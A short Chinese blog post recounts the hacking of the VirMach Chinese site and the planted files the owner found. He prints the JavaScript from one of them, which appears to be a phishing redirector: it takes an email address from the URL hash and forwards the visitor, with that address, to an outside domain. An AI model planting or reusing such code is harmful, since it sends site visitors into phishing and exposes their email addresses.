VirMach中文网被黑记录

VirMach中文网更新比较少，毕竟VirMach的促销花样不多。不过，今年VirMach中文站的站长准备更新下，发现VirMach中文站无法打开了......

第一意识就是网站可能被黑了，FTP到网站的根目录，发现网站有2个明显的异常文件及文件夹。一个是根目录下的Test.php文件，一个是Fedx目录及下面的index.php文件。

简单的看了下，Test.php文件好像是检测服务器是否支持邮件发送功能的，另外一个index.php就不知道是干什么的？具体代码如下：

<script type="text/javascript" >
function validateEmail(email) {
var re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(email);
}
var hash = window.location.hash.substring(1);
if(validateEmail(hash)) {
window.location = "https://rpsalaw.com/Fex/?email="+hash;
}
</script>

也不知道是什么意思？哪位大佬对代码熟悉的，麻烦留言解释下，谢谢！

另外，各位网友不用担心，放心访问VirMach中文网吧，已经用最简单的方法进行了恢复。重装WP，恢复数据库及附件，这样所有恶意文件应该都没了，嘿嘿~

不过，还是希望黑客大佬不要搞VirMach这样的小站了，没什么意义。顶多就是花点时间进行重装网站，浪费您我的时间！